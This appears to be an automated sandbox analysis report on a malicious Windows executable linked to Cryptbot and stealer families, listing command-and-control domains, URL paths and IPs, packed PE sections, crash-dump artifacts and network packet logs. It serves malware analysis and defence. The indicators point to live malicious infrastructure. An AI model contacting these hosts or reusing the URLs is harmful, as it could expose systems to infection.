                                  Classification:mal100.troj.evad.winEXE@2/5@10/2
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HCA Information:Failed
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe

                                  Warnings

                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                  • Excluded IPs from analysis (whitelisted): 52.168.117.173, 13.107.246.63, 40.126.53.9, 20.12.23.50
                                  • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, otelrules.azureedge.net, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                  • VT rate limit hit for: j6Nv9kUydV.exe

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  11:18:08API Interceptor3x Sleep call for process: j6Nv9kUydV.exe modified
                                  11:18:44API Interceptor1x Sleep call for process: WerFault.exe modified

                                  Joe Sandbox View / Context

                                  IPs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  185.121.15.19228PCC9oa8s.exeGet hashmaliciousUnknownBrowse
                                  • home.fivetk5vt.top/hLfzXsaqNtoEGyaUtOMJ1734514745
                                  HHFgVU1HGu.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                  • home.fivetk5vt.top/hLfzXsaqNtoEGyaUtOMJ1734514745
                                  GxSEtDSBuK.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                  • home.fivetk5vt.top/hLfzXsaqNtoEGyaUtOMJ1734514745
                                  iuO4kwUi17.exeGet hashmaliciousUnknownBrowse
                                  • home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
                                  nojxbVm8i4.exeGet hashmaliciousCryptbotBrowse
                                  • home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
                                  QnYodX3dYf.exeGet hashmaliciousCryptbotBrowse
                                  • home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
                                  WP6s7cCLzr.exeGet hashmaliciousUnknownBrowse
                                  • home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
                                  h9CywWZk71.exeGet hashmaliciousCryptbotBrowse
                                  • home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
                                  icDcFzyHRy.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                  • home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
                                  5ZH9uXmzGP.exeGet hashmaliciousUnknownBrowse
                                  • home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
                                  98.85.100.80q79Pocl81P.exeGet hashmaliciousCryptbotBrowse
                                    28PCC9oa8s.exeGet hashmaliciousUnknownBrowse
                                      fnuFOEqg4j.exeGet hashmaliciousUnknownBrowse
                                        iuO4kwUi17.exeGet hashmaliciousUnknownBrowse
                                          S0O8qbVwLk.exeGet hashmaliciousUnknownBrowse
                                            QnYodX3dYf.exeGet hashmaliciousCryptbotBrowse
                                              EMasovlyrQ.exeGet hashmaliciousUnknownBrowse
                                                h9CywWZk71.exeGet hashmaliciousCryptbotBrowse
                                                  icDcFzyHRy.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    5ZH9uXmzGP.exeGet hashmaliciousUnknownBrowse

                                                      Domains

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      httpbin.orgq79Pocl81P.exeGet hashmaliciousCryptbotBrowse
                                                      • 98.85.100.80
                                                      28PCC9oa8s.exeGet hashmaliciousUnknownBrowse
                                                      • 98.85.100.80
                                                      HHFgVU1HGu.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                      • 34.226.108.155
                                                      GxSEtDSBuK.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                      • 34.226.108.155
                                                      fnuFOEqg4j.exeGet hashmaliciousUnknownBrowse
                                                      • 98.85.100.80
                                                      ob4eL9Z1O4.exeGet hashmaliciousCryptbotBrowse
                                                      • 34.226.108.155
                                                      iuO4kwUi17.exeGet hashmaliciousUnknownBrowse
                                                      • 98.85.100.80
                                                      S0O8qbVwLk.exeGet hashmaliciousUnknownBrowse
                                                      • 98.85.100.80
                                                      nojxbVm8i4.exeGet hashmaliciousCryptbotBrowse
                                                      • 34.226.108.155
                                                      QnYodX3dYf.exeGet hashmaliciousCryptbotBrowse
                                                      • 98.85.100.80
                                                      home.fivetk5vt.top28PCC9oa8s.exeGet hashmaliciousUnknownBrowse
                                                      • 185.121.15.192
                                                      HHFgVU1HGu.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                      • 185.121.15.192
                                                      GxSEtDSBuK.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                      • 185.121.15.192
                                                      file.exeGet hashmaliciousScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, VidarBrowse
                                                      • 176.53.146.212
                                                      Tii6ue74NB.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Stealc, VidarBrowse
                                                      • 176.53.146.212
                                                      file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYSBrowse
                                                      • 176.53.146.212
                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                      • 176.53.146.212
                                                      s3hvuz3XS0.exeGet hashmaliciousCryptbotBrowse
                                                      • 176.53.146.212
                                                      65AcuGF7W7.exeGet hashmaliciousCryptbotBrowse
                                                      • 176.53.146.212
                                                      9nYVfFos77.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                      • 176.53.146.212

                                                      ASNs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      TWC-11351-NORTHEASTUSq79Pocl81P.exeGet hashmaliciousCryptbotBrowse
                                                      • 98.85.100.80
                                                      28PCC9oa8s.exeGet hashmaliciousUnknownBrowse
                                                      • 98.85.100.80
                                                      fnuFOEqg4j.exeGet hashmaliciousUnknownBrowse
                                                      • 98.85.100.80
                                                      iuO4kwUi17.exeGet hashmaliciousUnknownBrowse
                                                      • 98.85.100.80
                                                      S0O8qbVwLk.exeGet hashmaliciousUnknownBrowse
                                                      • 98.85.100.80
                                                      QnYodX3dYf.exeGet hashmaliciousCryptbotBrowse
                                                      • 98.85.100.80
                                                      EMasovlyrQ.exeGet hashmaliciousUnknownBrowse
                                                      • 98.85.100.80
                                                      h9CywWZk71.exeGet hashmaliciousCryptbotBrowse
                                                      • 98.85.100.80
                                                      icDcFzyHRy.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                      • 98.85.100.80
                                                      5ZH9uXmzGP.exeGet hashmaliciousUnknownBrowse
                                                      • 98.85.100.80
                                                      REDSERVICIOES28PCC9oa8s.exeGet hashmaliciousUnknownBrowse
                                                      • 185.121.15.192
                                                      HHFgVU1HGu.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                      • 185.121.15.192
                                                      GxSEtDSBuK.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                      • 185.121.15.192
                                                      iuO4kwUi17.exeGet hashmaliciousUnknownBrowse
                                                      • 185.121.15.192
                                                      nojxbVm8i4.exeGet hashmaliciousCryptbotBrowse
                                                      • 185.121.15.192
                                                      QnYodX3dYf.exeGet hashmaliciousCryptbotBrowse
                                                      • 185.121.15.192
                                                      WP6s7cCLzr.exeGet hashmaliciousUnknownBrowse
                                                      • 185.121.15.192
                                                      h9CywWZk71.exeGet hashmaliciousCryptbotBrowse
                                                      • 185.121.15.192
                                                      icDcFzyHRy.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                      • 185.121.15.192
                                                      5ZH9uXmzGP.exeGet hashmaliciousUnknownBrowse
                                                      • 185.121.15.192

                                                      JA3 Fingerprints

                                                      No context

                                                      Dropped Files

                                                      No context

                                                      Created / dropped Files

                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_j6Nv9kUydV.exe_fae8d16834f70bb701162d0d223407d1153574b_257077aa_db8a1389-ff7d-45da-9afc-794fef9e2b9c\Report.wer

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.9429369495208305
                                                      Encrypted:false
                                                      SSDEEP:192:IQiqiAoX0BU/gju0ZrPMtwzuiFjZ24IO8e:diqakBU/gj5zuiFjY4IO8e
                                                      MD5:7F543C3F7250D751AD0CBED9CC878FD1
                                                      SHA1:A6FF33B9251B5700B44931505DD77C9756C3F66B
                                                      SHA-256:8CF47282565D87AEE37288C20319F234E05BF7602B059E241A1763F010893381
                                                      SHA-512:152159BE2685D566DE9C4CB67994DFA7AB5D22BA43B6A13EB794E98A9CCC7948F3CBD7E5AA305DBE46B5E0EBF7D786C90F48BE5A5ED154E4559CAE530CC13FAF
                                                      Malicious:true
                                                      Reputation:low
                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.1.8.5.0.9.4.6.1.0.7.6.5.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.1.8.5.0.9.5.2.5.1.3.7.6.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.b.8.a.1.3.8.9.-.f.f.7.d.-.4.5.d.a.-.9.a.f.c.-.7.9.4.f.e.f.9.e.2.b.9.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.7.1.e.6.6.d.d.-.b.8.f.0.-.4.4.7.c.-.b.5.2.8.-.8.5.8.b.9.7.8.f.7.b.9.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.j.6.N.v.9.k.U.y.d.V...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.f.b.8.-.0.0.0.1.-.0.0.1.3.-.d.e.f.8.-.c.2.b.d.f.a.5.2.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.9.3.5.5.7.5.2.f.7.1.b.5.8.9.f.b.5.8.6.2.8.3.6.c.7.f.a.9.e.4.e.0.0.0.0.f.f.f.f.!.0.0.0.0.a.8.3.b.2.4.6.e.f.3.2.b.7.a.6.6.a.8.c.b.b.c.5.4.e.d.d.3.b.b.6.6.7.f.9.5.6.b.9.b.!.j.6.N.v.9.k.U.y.d.V...e.x.e.....T.a.r.g.e.t.A.p.p.

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER25E9.tmp.dmp

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Mini DuMP crash report, 15 streams, Fri Dec 20 16:18:14 2024, 0x1205a4 type
                                                      Category:dropped
                                                      Size (bytes):217308
                                                      Entropy (8bit):1.357237060320799
                                                      Encrypted:false
                                                      SSDEEP:384:FSiNxAst+rTEq0kHPr1rdW0jzzXs4dSGd+ocAXmyN9CHLAI5E4FfvV:Fpgst+HEq0EZbzzXs4ww+rAxI5F
                                                      MD5:32F33F20C20923D0F86CF19C14216E26
                                                      SHA1:9820BC9B98D4032A1A66B690C3B86ADD1A422C0F
                                                      SHA-256:3F64B48184EEF73388DD28E75387110E0D668F2EC5B985400503217C48C8A9A9
                                                      SHA-512:65725FE805362F695FCC3D28AAA46CD8B427A470F94C9042F2693459433F4D89640C47B59510179887AC312BC9FE1B4AB1CD08EAED666996319C30B1E27412BB
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:MDMP..a..... ........eg............t...........D................ ...........}..........`.......8...........T............,..D$..........P!..........<#..............................................................................eJ.......#......GenuineIntel............T.............eg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER2780.tmp.WERInternalMetadata.xml

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):8354
                                                      Entropy (8bit):3.700424074609968
                                                      Encrypted:false
                                                      SSDEEP:192:R6l7wVeJCA6NPX6YWrSU9zgmfxbAprR89btcsfJQPm:R6lXJ96t6YKSU9zgmfxbTtvfJl
                                                      MD5:AB93E91A25B29BAF982E3B1117492989
                                                      SHA1:48E8C9E8F0F48C1872555FA92539246205D0D8A4
                                                      SHA-256:658E5D2B4EAE1BC9494046FD5581021C506A9F3DD16A0A76B61723AC5B35E562
                                                      SHA-512:E606D8F84E7F85F81FB3695E2063E14E58268CB1081A9002B36A24833D0070A1D313D8B153030ECCF23BA056273F2624403E953CF554C15D5CDF99E0BEE20BD1
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.8.1.2.0.<./.P.i.

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER27B0.tmp.xml

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4594
                                                      Entropy (8bit):4.4778948378194565
                                                      Encrypted:false
                                                      SSDEEP:48:cvIwWl8zswJg77aI9CkyWpW8VYBYm8M4JX5FZop+q8/oQ9dtzGDwMdd:uIjf2I7w87VxJ9m09bzGLdd
                                                      MD5:2A8A6D36BC3F42D5AD71874346E0BB99
                                                      SHA1:7A3A3A66B1BA2A54A4AFB2364703F464506B1E26
                                                      SHA-256:4F8848145F560F9E0312F7AC8496169E777B67D373F0A5BF572867A8B6A6D0D4
                                                      SHA-512:7A8B6A20C9AC070B703B808D69696097E45192718F7C5C223A60F5DE8D2E97D5FBEB1F2B9DEF8CB27A11231A7D21944B5222A6EB510BB4840F107B43DCBA65AB
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="639800" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                      C:\Windows\appcompat\Programs\Amcache.hve

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:MS Windows registry file, NT/2000 or above
                                                      Category:dropped
                                                      Size (bytes):1835008
                                                      Entropy (8bit):4.296009486196481
                                                      Encrypted:false
                                                      SSDEEP:6144:u41fWRYkg7Di2vXoy00lWZgiWaaKxC44Q0NbuDs+1/mBMZJh1Vjb:/1/YCW2AoQ0Niv/wMHrVf
                                                      MD5:6F385031B219B08EE4733EC52A6F89CF
                                                      SHA1:B3FF3A918F91BCBB790F972FE0FD865CD722BE0F
                                                      SHA-256:BE3F3BDFB26CD29B2605E3F238C91B51AF7CDCABB11913151077BDDC22D813A9
                                                      SHA-512:33269793AC0361F220BD02DDF22EB0A2DE946800C24401447C2ACFEC5511DAE620FFD39DA0AE3329E57873F31AEF1FB798759B453C738F70F3813F7F0CE2576B
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:regfG...G....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.Yl..R................................................................................................................................................................................................................................................................................................................................................x.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      Static File Info

                                                      General

                                                      File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                      Entropy (8bit):7.98547235353201
                                                      TrID:
                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                      • DOS Executable Generic (2002/1) 0.02%
                                                      • VXD Driver (31/22) 0.00%
                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                      File name:j6Nv9kUydV.exe
                                                      File size:4'495'360 bytes
                                                      MD5:84e0e622857460da96501532a233c862
                                                      SHA1:a83b246ef32b7a66a8cbbc54edd3bb667f956b9b
                                                      SHA256:0924a04e22be1339356c24b69b2e75516c56b0b23aa500e9068b9c28c54dd5b9
                                                      SHA512:db686ccaa7ed5c1707f18a9482257ad1b1f9101be0d3e975b4aa18f6eec5ed1860aa881b21f9c8265a0ac58c39becf433fff98de874c364b9953eb542f12d1ce
                                                      SSDEEP:98304:Sbmf0HEYlXEh8T9Vp33Jp5JdJ9PRpyOnb+tQUAFPJNpzBgyX2+HlDuAw8TV:MrkYtK8Z33ZpX3tndnqCPDFGW2UUMp
                                                      TLSH:7C263398A606FAAED9DE1A35BD93AFAB363A3D5929F368037841F431CC476530D0510F
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....bg...............(.DI..$l..2...........`I...@..........................@.......SE...@... ............................

                                                      File Icon

                                                      Icon Hash:90cececece8e8eb0

                                                      Static PE Info

                                                      General

                                                      Entrypoint:0xff1000
                                                      Entrypoint Section:.taggant
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                                      DLL Characteristics:DYNAMIC_BASE
                                                      Time Stamp:0x6762999F [Wed Dec 18 09:45:03 2024 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                      Entrypoint Preview

                                                      Instruction
                                                      jmp 00007FBCC4BB52EAh
                                                      pcmpeqd mm0, qword ptr [eax+eax+00h]
                                                      add byte ptr [eax], al
                                                      add cl, ch
                                                      add byte ptr [eax], ah
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax+00h], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add cl, byte ptr [edx]
                                                      add byte ptr [eax], al
                                                      add al, 0Ah
                                                      add byte ptr [eax], al
                                                      push es
                                                      or al, byte ptr [eax]
                                                      add byte ptr [0100000Ah], al
                                                      or al, byte ptr [eax]
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [edx], al
                                                      add byte ptr [eax], 00000000h
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      adc byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      push es
                                                      or al, byte ptr [eax]
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [ebx], ah
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [esi], al
                                                      or al, byte ptr [eax]
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al

                                                      Data Directories

                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x69905f0x73.idata
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x6980000x1ac.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xbef1b40x10zqcjcxyz
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0xbef1640x18zqcjcxyz
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                      Sections

                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      0x10000x6970000x28480046327e44246734527f9261e202795c7eunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      .rsrc0x6980000x1ac0x2003e1dad673ddf4707d65e830efe33998dFalse0.58203125data4.59621446893802IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      .idata 0x6990000x10000x2008da1d90f4e8ad8e1606b904e7bc64d29False0.166015625data1.1687723252187228IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      0x69a0000x3940000x200310a6fac16df1b4448cfe0f9e849c029unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      zqcjcxyz0xa2e0000x1c20000x1c1400380ba1ae335babe12ce350be5fc065c8False0.9944025632999444data7.95599128870457IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      eomoelfg0xbf00000x10000x4001d941598104b5375c52a6cc4568cee76False0.8310546875data6.374305751501124IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      .taggant0xbf10000x30000x22009b03614313af33a902ff25b3565956eeFalse0.06950827205882353DOS executable (COM)0.8007339059437986IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                      Resources

                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                      RT_MANIFEST0xbef1c40x152ASCII text, with CRLF line terminators0.6479289940828402

                                                      Imports

                                                      DLLImport
                                                      kernel32.dlllstrcpy

                                                      Network Behavior

                                                      Network Port Distribution

                                                      TCP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Dec 20, 2024 17:18:03.875032902 CET49705443192.168.2.1098.85.100.80
                                                      Dec 20, 2024 17:18:03.875062943 CET4434970598.85.100.80192.168.2.10
                                                      Dec 20, 2024 17:18:03.875322104 CET49705443192.168.2.1098.85.100.80
                                                      Dec 20, 2024 17:18:03.962753057 CET49705443192.168.2.1098.85.100.80
                                                      Dec 20, 2024 17:18:03.962788105 CET4434970598.85.100.80192.168.2.10
                                                      Dec 20, 2024 17:18:05.698151112 CET4434970598.85.100.80192.168.2.10
                                                      Dec 20, 2024 17:18:05.698605061 CET49705443192.168.2.1098.85.100.80
                                                      Dec 20, 2024 17:18:05.698623896 CET4434970598.85.100.80192.168.2.10
                                                      Dec 20, 2024 17:18:05.700050116 CET4434970598.85.100.80192.168.2.10
                                                      Dec 20, 2024 17:18:05.700105906 CET49705443192.168.2.1098.85.100.80
                                                      Dec 20, 2024 17:18:05.701206923 CET49705443192.168.2.1098.85.100.80
                                                      Dec 20, 2024 17:18:05.701280117 CET4434970598.85.100.80192.168.2.10
                                                      Dec 20, 2024 17:18:05.705580950 CET49705443192.168.2.1098.85.100.80
                                                      Dec 20, 2024 17:18:05.705588102 CET4434970598.85.100.80192.168.2.10
                                                      Dec 20, 2024 17:18:05.759426117 CET49705443192.168.2.1098.85.100.80
                                                      Dec 20, 2024 17:18:06.501622915 CET4434970598.85.100.80192.168.2.10
                                                      Dec 20, 2024 17:18:06.501722097 CET4434970598.85.100.80192.168.2.10
                                                      Dec 20, 2024 17:18:06.501782894 CET49705443192.168.2.1098.85.100.80
                                                      Dec 20, 2024 17:18:06.510437965 CET49705443192.168.2.1098.85.100.80
                                                      Dec 20, 2024 17:18:06.510468960 CET4434970598.85.100.80192.168.2.10
                                                      Dec 20, 2024 17:18:07.813508034 CET4971680192.168.2.10185.121.15.192
                                                      Dec 20, 2024 17:18:07.933070898 CET8049716185.121.15.192192.168.2.10
